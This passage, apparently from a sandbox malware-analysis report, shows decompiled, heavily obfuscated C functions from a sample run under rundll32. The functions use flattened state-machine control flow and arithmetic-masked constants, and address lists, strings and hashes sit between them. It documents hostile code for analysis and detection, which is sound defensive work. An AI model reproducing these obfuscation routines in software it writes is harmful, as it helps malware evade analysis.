												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E00248736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E00248736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E0024F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E00257830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

0x002542da
0x002542e4
0x002542eb
0x002542ef
0x002542f6
0x002542fd
0x00254304
0x00254305
0x00254306
0x0025430b
0x00254316
0x00254319
0x00254323
0x0025432e
0x00254330
0x00254338
0x0025433d
0x00254342
0x00254344
0x00254348
0x0025434d
0x00254355
0x0025435d
0x00254365
0x0025436a
0x00254372
0x0025437d
0x00254388
0x00254393
0x0025439b
0x002543a0
0x002543a8
0x002543b0
0x002543b8
0x002543c3
0x002543cb
0x002543d6
0x002543de
0x002543ed
0x002543f0
0x002543f4
0x002543fc
0x00254404
0x00254409
0x00254411
0x00254419
0x00254421
0x00254429
0x0025442e
0x00254433
0x0025443b
0x00254443
0x0025444b
0x00254453
0x0025445b
0x00254463
0x0025446e
0x00254479
0x00254484
0x00254494
0x0025449c
0x0025449f
0x002544a3
0x002544ab
0x002544b3
0x002544bb
0x002544c3
0x002544cb
0x002544d6
0x002544e1
0x002544ee
0x002544fd
0x00254500
0x00254504
0x0025450c
0x00254514
0x0025451c
0x00254524
0x0025452c
0x00254534
0x00254541
0x00254545
0x0025454d
0x00254555
0x00254568
0x0025456f
0x0025457a
0x00254582
0x00254587
0x0025458f
0x00254597
0x0025459f
0x002545af
0x002545b3
0x002545b8
0x002545c0
0x002545c8
0x002545d4
0x002545d9
0x002545df
0x002545e7
0x002545f4
0x002545f5
0x002545f9
0x00254601
0x00254609
0x00254611
0x00254616
0x0025461e
0x00254629
0x00254634
0x0025463f
0x00254647
0x0025464f
0x00254657
0x0025465f
0x00254667
0x0025466f
0x00254674
0x0025467c
0x0025468a
0x0025468e
0x00254696
0x0025469b
0x002546a3
0x002546ab
0x002546b3
0x002546bb
0x002546c3
0x002546cb
0x002546d0
0x002546d8
0x002546e0
0x002546f0
0x002546f5
0x002546fe
0x00254709
0x00254714
0x0025471f
0x0025472a
0x00254735
0x0025473d
0x00254748
0x00254750
0x00254758
0x0025475d
0x00254765
0x0025476d
0x00254778
0x00254780
0x0025478b
0x00254793
0x0025479b
0x002547a3
0x002547ab
0x002547b3
0x002547be
0x002547c9
0x002547d4
0x002547e0
0x002547e3
0x002547e7
0x002547ef
0x002547f6
0x002547fa
0x002547fa
0x002547ff
0x002547ff
0x00254805
0x00000000
0x00000000
0x0025480b
0x0025480b
0x00254939
0x0025494b
0x00254950
0x00254955
0x002549e0
0x002549e0
0x00000000
0x0025495b
0x00254966
0x0025496e
0x00254980
0x00254984
0x00254988
0x00000000
0x00254988
0x00000000
0x00254811
0x00254813
0x002548d7
0x002548fa
0x002548fd
0x00254902
0x00254a70
0x00254a70
0x00254a74
0x00000000
0x00254819
0x0025481f
0x002548a2
0x002548a9
0x00000000
0x00254821
0x00254827
0x00000000
0x00254aa3
0x00254833
0x00254877
0x0025487c
0x00254884
0x00000000
0x00254835
0x0025483b
0x00254a79
0x00254a7f
0x00254a81
0x002547ff
0x002547ff
0x00254805
0x00000000
0x00000000
0x00000000
0x00254805
0x00000000
0x002547ff
0x00254841
0x00254850
0x00254851
0x00254857
0x0025485c
0x00254862
0x00254868
0x0025486d
0x0025486d
0x00254871
0x00254871
0x00000000
0x00254871
0x00254862
0x0025483b
0x00254833
0x0025481f
0x00254813
0x00254aae
0x00254aae
0x00000000
0x00254990
0x00254996
0x00254a4d
0x00254a4e
0x00254a54
0x00254a59
0x00254a5f
0x00254a6b
0x00000000
0x00254a61
0x00254a61
0x00000000
0x00254a61
0x0025499c
0x002549a2
0x00254a10
0x00254a15
0x00254a19
0x00254a1e
0x00254a25
0x00254a2e
0x00254a33
0x00000000
0x002549a4
0x002549aa
0x002549d8
0x002549dd
0x00000000
0x002549ac
0x002549b2
0x00000000
0x002549b8
0x002549b8
0x00000000
0x002549b8
0x002549b2
0x002549aa
0x002549a2
0x00000000
0x00254996
0x002547ff

Strings

+^, xrefs: 00254463
R.93, xrefs: 002548F0
RESCDIR, xrefs: 00254852
dEH, xrefs: 0025473D
l), xrefs: 00254355
R.93, xrefs: 002549A4

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +^$R.93$R.93$RESCDIR$dEH$l)
API String ID: 0-1973027218
Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction ID: 55b2e13295566459145d88a5069db1450953669d74e421ba4a7a45da013d1be8
Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
Instruction Fuzzy Hash: BF0243725183819FE3A8DF24C48AA5BFBE1FBC4318F108A1DE5D996260D7B48949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002502C3, Relevance: 7.7, Strings: 6, Instructions: 248
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E002502C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0024F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0025AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0024B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00253E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00247F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00254F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}

0x002502c3
0x002502c9
0x002502d3
0x002502db
0x002502e9
0x002502ea
0x002502ec
0x002502f1
0x002502f5
0x00250305
0x0025030b
0x00250313
0x0025031b
0x00250323
0x00250328
0x00250334
0x00250339
0x0025033f
0x00250347
0x0025034f
0x00250354
0x00250360
0x00250365
0x0025036b
0x00250373
0x0025037f
0x00250384
0x0025038a
0x00250392
0x0025039a
0x002503a3
0x002503a8
0x002503ae
0x002503b6
0x002503be
0x002503c6
0x002503ce
0x002503d6
0x002503de
0x002503e3
0x002503ef
0x002503f2
0x002503f6
0x002503fe
0x00250406
0x0025040b
0x00250413
0x0025041b
0x00250420
0x00250428
0x00250430
0x00250438
0x00250440
0x00250448
0x00250459
0x00250461
0x00250465
0x0025046d
0x00250475
0x00250485
0x00250489
0x00250496
0x00250499
0x0025049d
0x002504a5
0x002504b2
0x002504b6
0x002504be
0x002504c6
0x002504ce
0x002504d6
0x002504db
0x002504e3
0x002504eb
0x002504fb
0x002504ff
0x00250504
0x0025050c
0x00250514
0x0025051c
0x00250524
0x0025052c
0x00250534
0x0025053c
0x00250549
0x0025054c
0x00250550
0x00250554
0x0025055c
0x00250564
0x00250569
0x00250571
0x00250579
0x0025057d
0x0025058a
0x0025058e
0x00250596
0x0025059e
0x002505a6
0x002505ae
0x002505b6
0x002505ba
0x002505bb
0x002505bd
0x002505c1
0x002505c9
0x002505c9
0x002505d7
0x002506f4
0x002506fd
0x00250708
0x0025070f
0x00250711
0x00250713
0x00250719
0x0025071b
0x0025071b
0x00250715
0x00250715
0x00250717
0x00000000
0x00000000
0x00250717
0x00250713
0x002505dd
0x002505e3
0x0025068a
0x0025068e
0x00250692
0x00250697
0x0025069a
0x00000000
0x002505e9
0x002505ef
0x0025065f
0x00250663
0x00250668
0x0025066a
0x0025066d
0x00250670
0x00250676
0x00000000
0x00250676
0x002505f1
0x002505f7
0x00250610
0x0025061b
0x00250621
0x00250622
0x00250624
0x0025062a
0x00000000
0x0025062a
0x002505f9
0x002505ff
0x00000000
0x00250605
0x00250605
0x00000000
0x00250605
0x002505ff
0x002505f7
0x002505ef
0x002505e3
0x0025071f
0x00250728
0x00250728
0x002506a4
0x002506be
0x002506c3
0x002506c9
0x002506d0
0x002506d8
0x002506d8
0x002506de
0x002506e3
0x002506e6
0x002506e6
0x002506e6
0x00000000

Strings

u^, xrefs: 00250347
[, xrefs: 002503FE
#,', xrefs: 002502DB
#, xrefs: 00250373
Sq, xrefs: 002504A5
Fj, xrefs: 002504CE

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #,'$#$Fj$Sq$[$u^
API String ID: 0-3347335214
Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction ID: 40806b94de2e2acbdfebccb9f74c728e6fbbe419965b72ffee982b5daa623340
Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
Instruction Fuzzy Hash: 96B151725083819FE358CF64C88940BFBE2FBC4758F108A1DF495962A0D7B99A59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0024EE78, Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0024EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0024C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00253E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00247B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0025889D(0x25c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x25ca2c; // 0x2c8300
					_t176 = _t242 + 0x230; // 0x77004d
					E0024C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x25ca2c, _t204,  &_v1040);
					E00252025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}

0x0024ee78
0x0024ee7e
0x0024ee88
0x0024ee90
0x0024ee95
0x0024eea1
0x0024eea3
0x0024eea7
0x0024eeb6
0x0024eeb9
0x0024eec3
0x0024eec4
0x0024eeca
0x0024eed2
0x0024eeda
0x0024eedf
0x0024eee7
0x0024eeef
0x0024eef7
0x0024eeff
0x0024ef07
0x0024ef0f
0x0024ef14
0x0024ef1c
0x0024ef24
0x0024ef33
0x0024ef37
0x0024ef3f
0x0024ef4c
0x0024ef56
0x0024ef57
0x0024ef5d
0x0024ef65
0x0024ef74
0x0024ef78
0x0024ef80
0x0024ef88
0x0024ef8d
0x0024ef95
0x0024ef9d
0x0024efa5
0x0024efaf
0x0024efb3
0x0024efbb
0x0024efc3
0x0024efcb
0x0024efd3
0x0024efdb
0x0024efe3
0x0024efeb
0x0024eff3
0x0024effb
0x0024f003
0x0024f011
0x0024f012
0x0024f016
0x0024f01e
0x0024f028
0x0024f038
0x0024f03e
0x0024f04b
0x0024f055
0x0024f05d
0x0024f065
0x0024f06a
0x0024f072
0x0024f07a
0x0024f082
0x0024f08a
0x0024f092
0x0024f09a
0x0024f09f
0x0024f0a7
0x0024f0af
0x0024f0bb
0x0024f0c0
0x0024f0c6
0x0024f0ce
0x0024f0d6
0x0024f0de
0x0024f0eb
0x0024f0ec
0x0024f0f0
0x0024f0f8
0x0024f106
0x0024f10a
0x0024f117
0x0024f11b
0x0024f123
0x0024f123
0x0024f12d
0x0024f190
0x00000000
0x0024f12f
0x0024f135
0x0024f215
0x0024f13b
0x0024f13d
0x0024f185
0x0024f18c
0x00000000
0x0024f13f
0x0024f13f
0x0024f145
0x00000000
0x0024f14b
0x0024f157
0x0024f15f
0x0024f160
0x0024f16c
0x0024f16f
0x00000000
0x0024f16f
0x0024f145
0x0024f13d
0x0024f135
0x0024f21d
0x0024f229
0x0024f229
0x0024f194
0x0024f1a1
0x0024f1a6
0x0024f1c2
0x0024f1cc
0x0024f1d2
0x0024f1e5
0x0024f1ea
0x0024f1ed
0x0024f1f2
0x0024f1f2
0x0024f1f2
0x00000000

Strings

L, xrefs: 0024EFB3
6, xrefs: 0024F0CE
aD[a, xrefs: 0024F11B
I/5o, xrefs: 0024F072

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I/5o$aD[a$6$L
API String ID: 0-1330720659
Opcode ID: 64cdcd35b137b005adf91dd992e017ed9687d696902cccaf0d32a6edd37164d1
Instruction ID: 4a89527231b7f1d0ad3a7a27827e3dc941589d4bcf011c1f07380c8e625c823e
Opcode Fuzzy Hash: 64cdcd35b137b005adf91dd992e017ed9687d696902cccaf0d32a6edd37164d1
Instruction Fuzzy Hash: 849141711183419FD358CF25C58941BBBF6BBC4358F10892EF19A9A260D3B9CA19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00247B63, Relevance: 2.7, Strings: 2, Instructions: 187
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00247B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0024602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
